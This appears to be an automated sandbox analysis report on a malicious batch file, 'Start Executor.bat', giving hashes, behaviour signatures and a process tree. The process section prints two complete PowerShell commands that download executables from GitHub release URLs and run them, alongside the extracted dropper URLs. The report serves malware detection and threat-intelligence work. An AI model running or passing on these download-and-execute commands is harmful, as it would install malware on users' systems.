Analysis

  • max time kernel
    1528s
  • max time network
    1501s
  • platform
    windows11-21h2_x64
  • resource
    win11-20240709-en
  • resource tags

    arch:x64arch:x86image:win11-20240709-enlocale:en-usos:windows11-21h2-x64system
  • submitted
    26/07/2024, 13:16

General

  • Target

    Executor/Start Executor.bat

  • Size

    551B

  • MD5

    fe821790779e191b514f7d90b381d191

  • SHA1

    03be2cfc52ec390a30209c33f7ea3a42589a0785

  • SHA256

    6afbbef338a695004853bb806f146efdd2d216a1fa58cb34fd10509495b4415b

  • SHA512

    425cdb0bd257a71a952293c77984635484dd30a6fc8c9f287100a99016ffc51a884442595eb6eed102fcbceebb6b01f609ba45f5fb2535a3156a8eef04ab50aa

Score
10/10

Malware Config

Extracted

Language
ps1
Deobfuscated
URLs
exe.dropper

https://github.com/vlyian/scorpix/releases/download/vypix/Scorpix-ExecutorV3.exe

Extracted

Language
ps1
Deobfuscated
URLs
exe.dropper

https://github.com/vlyian/scorpixe/releases/download/vypix/ScorpixDLL.exe

Signatures

  • Blocklisted process makes network request 2 IoCs
  • Command and Scripting Interpreter: PowerShell 1 TTPs 2 IoCs

    Using powershell.exe command.

  • Suspicious behavior: EnumeratesProcesses 4 IoCs
  • Suspicious use of AdjustPrivilegeToken 2 IoCs
  • Suspicious use of WriteProcessMemory 4 IoCs

Processes

  • C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\Executor\Start Executor.bat"
    1⤵
    • Suspicious use of WriteProcessMemory
    PID:5028
    • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      powershell $down=New-Object System.Net.WebClient;$url='https://github.com/vlyian/scorpix/releases/download/vypix/Scorpix-ExecutorV3.exe';$file='Scorpix-ExecutorV3.exe'; $down.DownloadFile($url,$file);$exec=New-Object -com shell.application;$exec.shellexecute($file);exit
      2⤵
      • Blocklisted process makes network request
      • Command and Scripting Interpreter: PowerShell
      • Suspicious behavior: EnumeratesProcesses
      • Suspicious use of AdjustPrivilegeToken
      PID:4944
    • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      powershell $down=New-Object System.Net.WebClient;$url='https://github.com/vlyian/scorpixe/releases/download/vypix/ScorpixDLL.exe';$file='ScorpixDLL.exe'; $down.DownloadFile($url,$file);$exec=New-Object -com shell.application;$exec.shellexecute($file);exit
      2⤵
      • Blocklisted process makes network request
      • Command and Scripting Interpreter: PowerShell
      • Suspicious behavior: EnumeratesProcesses
      • Suspicious use of AdjustPrivilegeToken
      PID:2680

Network

MITRE ATT&CK Enterprise v15

Replay Monitor

Loading Replay Monitor...

Downloads

  • C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.log

    Filesize

    2KB

    MD5

    5f4c933102a824f41e258078e34165a7

    SHA1

    d2f9e997b2465d3ae7d91dad8d99b77a2332b6ee

    SHA256

    d69b7d84970cb04cd069299fd8aa9cef8394999588bead979104dc3cb743b4f2

    SHA512

    a7556b2be1a69dbc1f7ff4c1c25581a28cb885c7e1116632c535fee5facaa99067bcead8f02499980f1d999810157d0fc2f9e45c200dee7d379907ef98a6f034

  • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

    Filesize

    1KB

    MD5

    6f974f924033aa21493202e5edfcea2b

    SHA1

    8f19b88bfc19a6e9bdb2fa4952eda84384a6e62c

    SHA256

    353db94912ced8058a337a579c2431da31b1934cbb3578e2c63f13eac0d2deaa

    SHA512

    c3268aca736939c61901ecadfea9c67385ce47a20b4f7f1bd598b0b48761492920cdba5a732b4a77e0887c575fd28de6a8febecc193abb9cb59fe94424dc0cc8

  • C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_juvz2sfb.ep1.ps1

    Filesize

    60B

    MD5

    d17fe0a3f47be24a6453e9ef58c94641

    SHA1

    6ab83620379fc69f80c0242105ddffd7d98d5d9d

    SHA256

    96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7

    SHA512

    5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

  • memory/2680-30-0x00007FFBFD490000-0x00007FFBFDF52000-memory.dmp

    Filesize

    10.8MB

  • memory/2680-28-0x00007FFBFD490000-0x00007FFBFDF52000-memory.dmp

    Filesize

    10.8MB

  • memory/2680-26-0x00007FFBFD490000-0x00007FFBFDF52000-memory.dmp

    Filesize

    10.8MB

  • memory/2680-25-0x00007FFBFD490000-0x00007FFBFDF52000-memory.dmp

    Filesize

    10.8MB

  • memory/4944-10-0x00007FFBFD490000-0x00007FFBFDF52000-memory.dmp

    Filesize

    10.8MB

  • memory/4944-15-0x00007FFBFD490000-0x00007FFBFDF52000-memory.dmp

    Filesize

    10.8MB

  • memory/4944-12-0x00007FFBFD490000-0x00007FFBFDF52000-memory.dmp

    Filesize

    10.8MB

  • memory/4944-11-0x00007FFBFD490000-0x00007FFBFDF52000-memory.dmp

    Filesize

    10.8MB

  • memory/4944-0-0x00007FFBFD493000-0x00007FFBFD495000-memory.dmp

    Filesize

    8KB

  • memory/4944-9-0x000001A7692F0000-0x000001A769312000-memory.dmp

    Filesize

    136KB